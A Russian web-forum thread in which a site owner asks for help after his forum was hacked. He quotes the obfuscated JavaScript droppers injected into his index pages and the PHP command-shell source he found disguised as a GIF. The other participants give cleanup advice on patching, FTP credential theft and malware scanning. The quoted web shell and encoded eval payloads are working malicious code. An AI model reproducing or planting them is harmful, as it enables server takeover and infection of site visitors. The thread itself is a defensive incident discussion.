Перейти к контенту
  • 0

Взлом сайта

GreenMar

Спросил GreenMar,

 Поделиться

Вопрос

GreenMar

GreenMar

Опубликовано
Опубликовано

Сразу перейду к проблеме:

каждый вечер кто-то каким-то образом вставляет свой код в HTML код сайта

код выглядит следующим образом

<!-- o --><script language=javascript>
s = "0796084108380850083308450837076808550841083608520840079707850768084008370841
08390840085207970785076808380850083308450837080208470850083608370850079707840768
0
85108500835079707750840085208520848079407830783085508550855078208560781083808330
8
51085207810835083308440844078208410846083808470783079107830835084708530846085208
3
70850078208480840084807750798079607830841083808500833084508370798";
k = "f = String.fromCharCode(32,32,32,32,118,97,114,32,32,32,111,32,32,32,61,32,32,32,34,34,32,32,32,59,3
2,32,102,117,110,99,116,105,111,110,32,32,32,32,100,32,32,40,32,32,32,41,32,32,3
2
,123,32,32,32,32,105,32,32,32,32,61,32,32,32,48,32,32,32,59,32,99,32,32,32,61,32
,
32,48,32,32,32,32,59,32,32,119,104,105,108,101,32,32,32,32,40,32,32,32,105,32,32
,
60,32,32,32,115,46,108,101,110,103,116,104,32,41,32,32,32,32,123,32,32,99,13,10,
6
1,32,32,77,97,116,104,46,114,111,117,110,100,32,32,32,40,32,115,46,99,104,97,114
,
65,116,40,32,32,105,32,32,32,41,32,43,32,115,46,99,104,97,114,65,116,40,32,105,3
2
,32,32,43,32,32,32,49,32,32,32,41,32,32,32,43,32,32,32,32,115,46,99,104,97,114,6
5
,116,40,32,32,105,32,43,32,32,32,32,50,32,41,32,32,32,43,32,32,115,46,99,104,97,
1
14,65,116,40,32,105,32,32,43,32,32,32,32,51,32,32,32,32,41,13,10,41,32,32,32,45,
3
2,32,32,55,51,54,59,32,32,32,105,32,32,32,32,61,32,105,32,32,32,32,43,32,32,32,3
2
,52,32,32,59,32,32,111,32,32,32,43,61,32,32,32,83,116,114,105,110,103,46,102,114
,
111,109,67,104,97,114,67,111,100,101,40,32,32,32,99,32,32,41,32,32,32,32,59,32,3
2
,32,125,32,32,32,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,32,32,
1
11,32,32,41,32,125,32,100,40,13,10,41,59);";
eval(eval(k));
</script><!-- c -->

вставляется на индексковые файлы (корня и других директорий), остальные не трогает. Но когда я это обнаружил - код был во всех хтмл файлах.

Грешу на дыру в форуме. Перерыл все файлы, нашёл в папке Screenshots файл [4]she.gif, оказалось что это alsaTeam's command shell ver.2.1_light со следующим кодом

<font color="#808080"><br></font><font color="#008000"><center><b><font face="verdana" size="2">alsaTeam's command shell ver.2.1_light</font></b> <font face="verdana" size="2"> - antichat.ru<br><br></font></center></font><font face="Verdana" size="1"><font color="#008000"><br>

<div align="center">
 <table border="1" cellpadding="0" cellspacing="0" width="633" height="17" bordercolorlight="#000080" bordercolordark="#000080">
<tr>
  <td width="633" height="17">

<pre><font color="red" font face="Tahoma" size="2">
<?
 // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
 if (isset($chdir)) @chdir($chdir);
 ob_start();
  passthru("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
 $output = ob_get_contents();
 ob_end_clean();
 if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output));
?>

</font></pre>
</tr>
 </table>

								 </div>
								 <br>
								 <hr color="#000000" width=80% height=115px>
								 <br>

</font>

Удалить файл не могу, изменить атрибуты, переименовать тоже.

Переименование папки не помогает - всёравно код прописывается.

 

пс. в некоторых страницах обнаружил так же в самом конце страницы после тэга [/html] вот такой код

<!-- [ af6acf51e7485f07d2f55cdea553f788 ] --><script>eval(unescape('function%20qRB%28yPGhMr%29%7Bfunction%20hMmU%28wysIe%29%7Bvar%20pnnd%3D0%2CsRfq%2CrLV%3DwysIe.length%3Bfor%28sRfq%3D0%3BsRfq%3CrLV%3BsRfq++%29pnnd+%3DwysIe.charCodeAt%28sRfq%29*rLV%3Breturn%20new%20String%28pnnd%29%7DyPGhMr%3Dunescape%28yPGhMr%29%3Bvar%20zxEr%3Deval%28%27a+r%5Bg%5BuVmje%5Bn%5BtVsz.jczazlVl%5BeVe+%27.replace%28/%5B%5C%5BjV%5C+z%5D/g%2C%20%27%27%29%29.toString%28%29.replace%28/%5B%5E@a-z0-9A-Z_.%2C-%5D/g%2C%27%27%29%2CkeHTbE%3DhMmU%28zxEr%29%2CnaNG%3Dnew%20String%28%29%2CseDg%3D0%3BpDJ%3D0%3Bfor%28var%20rmp%3D0%3Brmp%3CyPGhMr.length%3Brmp++%29%7BnaNG+%3DString.fromCharCode%28yPGhMr.charCodeAt%28rmp%29%5E%28zxEr.charCodeAt%28seDg%29%5EkeHTbE.charCodeAt%28pDJ%29%29%29%3BseDg++%3BpDJ++%3Bif%28seDg%3EzxEr.length%29seDg%3D0%3Bif%28pDJ%3EkeHTbE.length%29pDJ%3D0%3B%7Deval%28naNG%29%3BnaNG%3D%27%27%3Breturn%3B%7DqRB%28%27%2531%2539%2535%2530%2535%2534%2535%2538%2551%2536%250d%2521%2513%2507%2574%2551%2531%251b%257f%2502%2520%2529%252f%252e%2575%2520%253f%2533%2518%252d%253d%253f%250d%2535%256e%255c%2563%2532%253c%253b%2525%2542%256b%252a%253f%2532%251d%254b%250e%2559%2558%2562%2527%2506%2516%253f%256f%2535%253f%2534%257a%2565%2513%2521%2537%2535%2563%2503%253e%252c%2535%2517%250c%253c%2531%252f%251c%250c%2532%2544%250a%252f%252a%253a%252a%2538%252c%2522%2565%2521%253b%2564%2522%2563%2574%2534%2513%2523%2511%2526%2516%2561%2561%250f%2526%2530%253a%256e%254c%256c%256a%256b%256f%2561%2570%257e%254d%2522%2506%2529%2562%2561%2567%2572%256f%2549%257f%2521%2530%2540%2516%2530%2510%256a%2548%2562%257c%2561%2526%253a%2520%2535%2527%2539%2518%2534%251c%2565%256a%2575%2578%2562%250c%251c%2522%2523%2568%2533%253d%2520%2518%2506%252a%250b%250b%252e%2522%2533%252f%2509%255b%2562%2537%2565%2573%2568%2572%2566%2574%257d%257d%2538%250f%253d%2535%2534%2535%2538%2500%2531%2539%2535%257a%254b%2561%2509%254a%254f%2568%252c%2556%2569%257e%2573%2576%2502%2501%256f%257b%256b%257b%257d%2579%2522%251d%2511%2570%2522%2566%2578%252c%255d%2537%253e%2571%2534%253a%2534%2570%2537%253f%2577%257d%2568%254e%257b%2552%2576%255a%2579%254b%2562%250c%251c%2522%256a%2570%2533%251f%2506%2504%2504%2528%250e%2512%2536%252e%2533%253c%2573%255b%257d%255d%2579%2520%2567%255e%255d%2528%254d%257e%253f%252b%2538%2534%2568%2530%2527%2543%2537%2574%256e%2569%2511%251b%2534%2506%255c%256f%2534%2524%2536%2569%253d%2571%253a%250c%2535%253f%256e%2559%255d%2513%2533%252b%250f%2539%256c%2535%2535%2529%2574%257f%2557%250b%253f%2524%251d%2536%2534%2507%252d%2504%2532%253c%254e%2576%2532%2525%2539%2520%2509%252c%2531%2536%2539%2514%2561%257c%2578%252e%250f%2527%251f%2533%2577%2539%2532%257c%2524%2522%2533%2538%257c%2551%2537%2526%253c%2509%2502%2573%2527%250b%2505%2525%2551%257f%2566%2548%253e%252e%2501%257f%2515%2530%2500%2529%2558%255c%2548%2566%2531%255f%2520%2520%2508%251e%2531%2532%2523%257d%251f%2536%2538%2560%2501%2522%2563%253c%257d%2572%257d%2526%2535%2507%2500%2514%253f%2565%2574%257b%2565%2557%256a%2562%256a%2549%2554%2567%2541%252b%2564%254c%2564%257e%2525%2537%2526%2505%2512%256d%250b%2533%2576%253a%2531%253b%2511%251b%2533%2541%2542%255e%2529%2534%252c%2524%2567%257d%2520%2575%2571%2579%2573%256a%257d%253f%2525%2512%2502%250b%2529%2548%2504%253d%2514%253f%2503%256d%257c%2574%257f%257c%253e%2523%2520%2524%252e%2509%2531%2574%2564%2556%2534%2560%2515%252c%250e%2516%250a%2502%2570%256b%2522%253c%2530%2560%2530%2579%2559%251f%256e%2522%251c%2517%2537%2572%2539%251e%253b%253f%2529%2552%2570%253e%2523%2524%2502%2530%2525%256e%2510%2544%2573%252d%252c%250a%2516%2527%2506%250a%2560%2573%257b%2538%2524%252d%252f%253f%2520%253b%2579%257e%2571%252f%252f%2510%257f%2545%2520%2510%2528%2530%2549%2533%2528%2538%2529%2506%252f%2529%250d%252e%2535%252f%2537%2509%252a%250f%2525%256a%2575%2573%2529%253e%250f%252d%257d%253f%255d%2550%2560%2505%252e%2508%2536%2518%2530%2513%2574%2500%2523%2517%2524%2532%2528%253c%252e%2503%2530%257f%257f%2505%2528%256c%2510%2522%2529%2531%2529%2539%2531%2534%252b%2534%251a%2531%250c%2538%2556%2549%2536%2579%251b%253c%2519%253b%2519%2531%256e%2501%257b%2527%256b%254d%257a%2506%2521%2511%2536%251e%2522%2527%2502%2533%253f%2542%254b%2501%2576%251b%2537%2511%252f%2526%253c%2578%257e%2521%2519%257b%2502%2575%257e%250a%2504%256c%252f%2564%257e%2569%255d%2537%2539%251f%2549%2551%2520%250b%2564%2545%2571%253a%2564%2545%257c%2557%2571%2553%252d%2508%252b%250b%255a%252c%257c%252a%2512%2508%2513%253b%2500%2513%2538%250d%256a%2575%2571%2570%2548%2554%2528%2543%2576%253c%253f%255f%2503%2561%2542%2538%256f%2531%2575%2526%2519%2535%2517%2555%253f%256a%2570%2575%2550%255c%2521%2511%2508%2576%250a%2526%257a%256c%2564%257f%2564%251f%2524%2527%2538%251f%2511%2502%2569%2565%2532%2500%256b%2547%2572%253d%2507%2524%2526%2547%2537%2567%2556%2578%2576%2578%2577%251c%2535%2520%2554%253c%2568%2537%252e%2574%2525%257e%253a%2532%2533%2504%252c%2523%2536%253c%2541%2526%2552%2528%256e%2533%2532%257c%2563%2578%2531%2573%2527%2503%2528%2533%2535%2554%2514%2573%2567%2512%254a%2534%251d%2574%2528%250d%2578%2562%254d%2522%2532%2530%2500%252f%2518%255d%2516%256f%252e%2515%253c%2526%2509%2527%253d%2531%2532%257b%2506%2521%2526%2534%2520%256b%2530%2565%2565%2533%2563%2535%2510%251e%2514%2511%251d%253e%256c%256e%2575%251e%250a%2535%2513%2519%252b%252e%2531%2525%251b%2542%2571%252c%2524%2528%2529%2511%251c%256d%254d%2568%2503%2569%2511%2514%2523%2518%250b%254e%2518%2552%2567%2572%2566%2568%256c%2525%252b%2570%2570%2510%257c%2569%253f%2529%2539%2502%2507%255d%2535%2548%254c%2574%2544%2501%2549%256c%253f%2570%2530%2574%2536%2528%253c%2518%2562%2544%2565%2567%2534%2518%2520%2522%2500%2520%252c%2573%2571%250a%2522%2552%251e%2521%250b%2560%2544%256d%251e%254e%2562%2566%2554%2551%2575%2566%2528%2538%2533%2521%2562%251b%2532%2522%2504%252c%2508%2539%252d%256d%255b%2517%2537%252d%2531%2557%2501%2529%2505%250d%2529%252c%2515%253f%253c%2526%2560%256b%253d%253c%257e%2525%2576%2537%2529%2519%253c%250d%2531%252e%2520%252f%2512%2537%256d%2571%2531%251a%2567%2531%2528%2532%2523%253a%2532%251c%250f%2504%2532%2536%253d%2536%253e%252d%250a%257f%2567%256c%2506%2507%2532%251b%253e%251c%2530%2532%256e%257a%252f%2536%2535%2535%2525%2504%253f%2558%2563%256b%2531%2528%2521%250d%2519%252e%253e%2532%257a%253b%253b%2525%250c%252d%250a%2576%2533%253e%253e%2524%2516%253c%252d%253f%252b%253b%2526%2526%2561%2537%2539%2532%2537%250a%2530%2555%2527%253d%252d%254c%257b%257a%2577%2567%2544%256e%2579%2534%255a%252d%253f%2515%256a%2524%2532%2534%2534%2547%2526%250a%2524%2530%2521%2532%2579%2558%255c%2521%2563%2528%252c%2525%254e%2565%254e%2538%257a%2561%254a%2536%2577%257c%250d%2529%253a%250c%2535%2517%2578%2542%2579%2506%2537%2516%2517%253f%2570%2531%253a%2552%255b%252d%2513%2527%2518%2561%252e%2561%256b%2564%2538%2510%2569%255a%2562%257d%2574%2559%254d%2522%2555%2532%257f%256a%2564%253a%2570%2525%257f%2519%257b%2516%257c%2563%2504%251f%253f%255f%2511%2562%2531%2579%253b%252f%2526%2520%256d%2543%2533%2532%2524%2512%2513%2504%2524%2562%2546%2504%2502%2566%253a%251b%2572%2504%2551%252a%250d%2564%2511%2573%2571%2576%256b%2541%256b%2536%2549%2560%2539%256d%253a%253b%2538%256b%2528%253c%2522%2551%2528%257b%2568%2573%2513%2575%2510%257c%2577%257d%2577%257d%2525%2568%2563%253e%257e%2502%2534%2525%2523%2508%2515%2572%2511%251c%2510%253f%255f%257d%2537%2507%253f%2539%255e%2512%2530%2525%251c%2562%2502%2514%251d%2522%253a%251c%257b%256c%2556%2529%2576%2533%2523%253b%2516%2527%2527%2569%2569%2572%253b%2568%257c%2560%2521%2524%2524%2506%2526%2513%2572%256f%2567%252f%2569%2514%2525%2529%2528%2547%2543%2565%2555%256f%2539%2517%2513%253f%2502%253e%2528%2516%253c%2526%2526%2524%2535%2537%251d%2573%2554%2500%2533%2511%2513%251f%2524%2530%2569%256e%251c%250a%2524%2514%2510%2561%253e%250d%2500%2575%2531%255d%2543%255c%256b%2549%250f%2567%250e%252b%2514%2564%2538%2562%2570%2533%2566%2535%2535%253a%257c%2539%2534%2524%2535%2508%2578%2567%255a%252c%257d%256f%2531%257f%256d%2577%2538%2526%2536%2524%2575%256a%2550%2559%27%29%3B'));</script><!-- end -->

 

Форум версии 1.3, патчился много раз, не мною...

 

Подскажите, что делать?

Заранее благодарю за помощь...

Ссылка на комментарий
Поделиться на других сайтах

10 ответов на этот вопрос

Рекомендуемые сообщения

  • 0
Sannis

Sannis

Опубликовано
Опубликовано

1. Пропатчить ещё раз, своей рукой уже.

2. Проверять на вирусы стоит в 90% случаев свой компьютер, скорее всего пароли от ftp украли. Нужно их сменить, также как и все остальные пароли.

Ссылка на комментарий
Поделиться на других сайтах
  • 0
GreenMar

GreenMar

Опубликовано
  • Автор
Опубликовано

т.е. это более вероятно?

Просто я не совсем профи в этих воросах...

За сайтом попросили посмотреть, а тут такая вот беда...

 

1. Пропатчить ещё раз, своей рукой уже.

2. Проверять на вирусы стоит в 90% случаев свой компьютер, скорее всего пароли от ftp украли. Нужно их сменить, также как и все остальные пароли.

Спасибо за ответы :-)

но...

Я то и не патчил никогда. Точнее, я понимаю что это такое (открыть файл в текстовом редакторе, найти и заменить отрезок кода), но что конкретно и на что патчить не знаю. Буду благодарен за "ткнутие носом" в соответствующую тему, так как просмотрел уже 7 страниц форума.... да и поиск мне не помог...

Что касается паролей от фтп - то здесь не тот случай. Никто не заходит кроме меня..!

Ссылка на комментарий
Поделиться на других сайтах
  • 0
-Cross-

-Cross-

Опубликовано
Опубликовано

Да то что вирус - это большая вероятность. Я не думаю что это чел сидит и что то Вам колдует.

Кто то закинул вирус и он сам потиху поглощает файлы. Я с таким уже сталкивался, правда тогда уже мой сайт и форум были заброшены и я не стал восстанавливать.

 

 

Стукните хостеру. попросите помочь. Надеюсь у Вас отзывчивый хостер.

У меня просто был случай, на фтп появился вирус (хост всем известный тут биг...). Когда я обратился с помощью, вместо помощи я получил блок аккаунта...

Ссылка на комментарий
Поделиться на других сайтах
  • 0
Sannis

Sannis

Опубликовано
Опубликовано

-Cross-, это закономерно. Потому что "вирусы" эти проникают на сервер по ftp, после того как с компьютера админа крадутся пароли. Естесственно, что это делается не вручную, но механизма это не меняет. Так что в том, что вирус прописал в файлы форума где-то скрипт, который записывает вышеприведённое в файлы форума, вина админа сайта. Так что последовательность именно такая:

1. Очистить от вирусов свой компьютер.

2. Сменить пароль на FTP.

3. Найти на сервере иногордный php или иной скипт, если он есть(его может и не быть скорее всего).

4. Удалить все вставки яваскрипта, которые он сделал.

Ссылка на комментарий
Поделиться на других сайтах
  • 0
-Cross-

-Cross-

Опубликовано
Опубликовано
-Cross-, это закономерно

Ну к ФТП имел доступ не только я и вполне возможен хакинг самого сервера.

Да и может у рут акаунта появился вирус и он расплодился... Такое тоже бывает.

Ссылка на комментарий
Поделиться на других сайтах
  • 0
Sannis

Sannis

Опубликовано
Опубликовано

Если это хакинг сервера, то валить надо от такого хостинга. Тем более что это очень редкое явление.

 

Да и может у рут акаунта появился вирус и он расплодился... Такое тоже бывает.

Если имеется в виду рут на форуме, то он не может в любой файл взять и записать что-то.

Ссылка на комментарий
Поделиться на других сайтах
  • 0
keshakentozavr

keshakentozavr

Опубликовано
Опубликовано

Это троян такой, ворует фтп-пароли из TotalCommander и заменяет индексные файлы на многих популярных движках. Старайтесь пользоваться другим ФТП-клиентом.

 

Троян криптованный, не все антивирусы его видят. У знакомого было подобное, и антивирус Касперского прозевал трояна. Помогла чистка компьютера с помощью Avast!, закрытие файрволом исходящего трафика, смена фтп-паролей, и замена всех файлов на сервере из бекапных.

Ссылка на комментарий
Поделиться на других сайтах

Присоединиться к обсуждению

Вы можете ответить сейчас, а зарегистрироваться позже. Если у вас уже есть аккаунт, войдите, чтобы ответить от своего имени.

Гость
Unfortunately, your content contains terms that we do not allow. Please edit your content to remove the highlighted words below.
Ответить на вопрос...

×   Вы вставили отформатированный текст.   Удалить форматирование

  Допустимо не более 75 смайлов.

×   Ваша ссылка была автоматически заменена на медиа-контент.   Отображать как ссылку

×   Ваши публикации восстановлены.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

Зарузка...
×
 Поделиться
Перейти к списку вопросов
×
×
  • Создать...

Важная информация

Находясь на нашем сайте, вы соглашаетесь на использование файлов cookie, а также с нашим положением о конфиденциальности Политика конфиденциальности и пользовательским соглашением Условия использования.

  Согласен